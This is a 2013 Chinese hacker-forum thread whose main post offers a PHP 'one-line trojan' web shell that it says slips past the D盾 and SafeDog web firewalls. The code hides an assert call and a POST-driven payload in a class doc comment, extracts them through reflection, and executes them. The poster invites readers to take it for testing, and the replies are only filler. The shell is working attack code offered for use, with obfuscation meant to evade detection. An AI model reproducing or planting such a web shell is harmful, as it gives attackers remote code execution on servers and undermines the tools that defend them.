搜索
查看: 353|回复: 2

最新能过D盾过安全狗的一句话木马

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2013-9-24 11:23:18 | 显示全部楼层 |阅读模式
北京时间
国家授时中心标准时间
2013年09月22日  周日

最新能过D盾过安全狗的一句话木马

不许能过,只要秒杀


PHP的一句话木马


<?php
/**
* $a=$_POST[];
* assert
*/
$a='';
class TestClass { }
$rc = new ReflectionClass('TestClass');
$str=$rc->getDocComment();
$pos=strpos($str,'$a');
$eval=substr($str,$pos,15);
$pos=strpos($str,'assert');
$fun=substr($str,$pos,6);
echo $eval;
$fun($eval);
echo $a;
$fun($a);
?>




需要的朋友可以拿去测试
您可以更新记录, 让好友们知道您在做什么...
854955425 该用户已被删除
发表于 2013-9-24 11:23:47 | 显示全部楼层
帮你顶下哈!!
专业回帖 该用户已被删除
发表于 2013-9-24 11:28:56 | 显示全部楼层
路过,学习下
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表